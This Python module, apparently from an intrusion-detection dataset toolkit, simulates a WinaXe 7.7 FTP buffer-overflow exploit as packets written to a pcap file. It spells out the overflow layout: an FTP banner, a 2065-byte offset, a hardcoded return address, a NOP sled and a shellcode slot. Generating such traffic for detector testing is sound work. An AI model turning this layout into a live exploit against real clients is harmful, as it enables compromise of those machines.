import logging
import ID2TLib.Utility

from random import randint
from lea import Lea
from scapy.layers.inet import IP, Ether, TCP

from Attack import BaseAttack
from Attack.AttackParameters import Parameter as Param
from Attack.AttackParameters import ParameterTypes
from ID2TLib.Utility import update_timestamp, generate_source_port_from_platform, get_rnd_x86_nop, forbidden_chars,\
    get_rnd_bytes , check_payload_len, handle_most_used_outputs

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# noinspection PyPep8

ftp_port = 21


class FTPWinaXeExploit(BaseAttack.BaseAttack):

    def __init__(self):
        """
        Creates a new instance of the FTPWinaXeExploit.

        """
        # Initialize attack
        super(FTPWinaXeExploit, self).__init__("FTPWinaXe Exploit", "Injects an WinaXe 7.7 FTP Exploit.",
                                               "Privilege elevation")

        # Define allowed parameters and their type
        self.supported_params.update({
            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
            Param.IP_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
            Param.CUSTOM_PAYLOAD: ParameterTypes.TYPE_STRING,
            Param.CUSTOM_PAYLOAD_FILE: ParameterTypes.TYPE_STRING
        })

    def init_params(self):
        """
        Initialize the parameters of this attack using the user supplied command line parameters.
        Use the provided statistics to calculate default parameters and to process user
        supplied queries.

        """
        # PARAMETERS: initialize with default values
        # (values are overwritten if user specifies them)
        most_used_ip_address = self.statistics.get_most_used_ip_address()

        # The most used IP class in background traffic
        most_used_ip_class = handle_most_used_outputs(self.statistics.process_db_query("most_used(ipClass)"))
        attacker_ip = self.generate_random_ipv4_address(most_used_ip_class)
        self.add_param_value(Param.IP_DESTINATION, attacker_ip)
        self.add_param_value(Param.MAC_DESTINATION, self.generate_random_mac_address())

        random_ip_address = self.statistics.get_random_ip_address()
        # victim should be valid and not equal to attacker
        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == attacker_ip:
            random_ip_address = self.statistics.get_random_ip_address()

        self.add_param_value(Param.IP_SOURCE, random_ip_address)
        victim_mac = self.statistics.get_mac_address(random_ip_address)
        if isinstance(victim_mac, list) and len(victim_mac) == 0:
            victim_mac = self.generate_random_mac_address()
        self.add_param_value(Param.MAC_SOURCE, victim_mac)
        self.add_param_value(Param.PACKETS_PER_SECOND,
                             (self.statistics.get_pps_sent(most_used_ip_address) +
                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
        self.add_param_value(Param.IP_SOURCE_RANDOMIZE, 'False')
        self.add_param_value(Param.CUSTOM_PAYLOAD, '')
        self.add_param_value(Param.CUSTOM_PAYLOAD_FILE, '')

    def generate_attack_pcap(self):

        pps = self.get_param_value(Param.PACKETS_PER_SECOND)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        ip_victim = self.get_param_value(Param.IP_SOURCE)
        ip_attacker = self.get_param_value(Param.IP_DESTINATION)
        mac_victim = self.get_param_value(Param.MAC_SOURCE)
        mac_attacker = self.get_param_value(Param.MAC_DESTINATION)

        custom_payload = self.get_param_value(Param.CUSTOM_PAYLOAD)
        custom_payload_len = len(custom_payload)
        custom_payload_limit = 1000
        check_payload_len(custom_payload_len, custom_payload_limit)

        packets = []

        # Create random victim if specified
        if self.get_param_value(Param.IP_SOURCE_RANDOMIZE):
            # The most used IP class in background traffic
            most_used_ip_class = handle_most_used_outputs(self.statistics.process_db_query("most_used(ipClass)"))
            ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
            mac_victim = self.generate_random_mac_address()

        # Get MSS, TTL and Window size value for victim/attacker IP
        victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(ip_victim)
        attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(ip_attacker)

        minDelay, maxDelay = self.get_reply_delay(ip_attacker)

        attacker_seq = randint(1000, 50000)
        victim_seq = randint(1000, 50000)

        sport = generate_source_port_from_platform("win7")

        # connection request from victim (client)
        victim_ether = Ether(src=mac_victim, dst=mac_attacker)
        victim_ip = IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
        request_tcp = TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
                          seq=victim_seq, options=[('MSS', victim_mss_value)])
        victim_seq += 1
        syn = (victim_ether / victim_ip / request_tcp)
        syn.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
        packets.append(syn)

        # response from attacker (server)
        attacker_ether = Ether(src=mac_attacker, dst=mac_victim)
        attacker_ip = IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
        reply_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
        attacker_seq += 1
        synack = (attacker_ether / attacker_ip / reply_tcp)
        synack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
        packets.append(synack)

        # acknowledgement from victim (client)
        ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                      window=victim_win_value, options=[('MSS', victim_mss_value)])
        ack = (victim_ether / victim_ip / ack_tcp)
        ack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
        packets.append(ack)

        # FTP exploit packet
        ftp_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])

        characters = b'220'
        characters += get_rnd_bytes(2065, forbidden_chars)
        characters += b'\x96\x72\x01\x68'
        characters += get_rnd_x86_nop(10, False, forbidden_chars)

        custom_payload_file = self.get_param_value(Param.CUSTOM_PAYLOAD_FILE)

        if custom_payload == '':
            if custom_payload_file == '':
                payload = get_rnd_bytes(custom_payload_limit, forbidden_chars)
            else:
                payload = ID2TLib.Utility.get_bytes_from_file(custom_payload_file)
                check_payload_len(len(payload), custom_payload_limit)
                payload += get_rnd_x86_nop(custom_payload_limit - len(payload), False, forbidden_chars)
        else:
            encoded_payload = custom_payload.encode()
            payload = get_rnd_x86_nop(custom_payload_limit - custom_payload_len, False, forbidden_chars)
            payload += encoded_payload

        characters += payload
        characters += get_rnd_x86_nop(20, False, forbidden_chars)
        characters += b'\r\n'

        ftp_tcp.add_payload(characters)

        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
        ftp_buff.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
        packets.append(ftp_buff)
        attacker_seq += len(ftp_tcp.payload)

        # Fin Ack from attacker
        fin_ack_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])

        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
        fin_ack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
        packets.append(fin_ack)

        # Ack from victim on FTP packet
        ftp_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                      window=victim_win_value, options=[('MSS', victim_mss_value)])
        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
        ftp_ack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
        packets.append(ftp_ack)

        # Ack from victim on Fin/Ack of attacker
        fin_ack_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq+1, flags='A',
                      window=victim_win_value, options=[('MSS', victim_mss_value)])
        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
        fin_ack_ack.time = timestamp_next_pkt
        packets.append(fin_ack_ack)

        # store end time of attack
        self.attack_end_utime = packets[-1].time

        # write attack packets to pcap
        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))

        # return packets sorted by packet time_sec_start
        return len(packets), pcap_path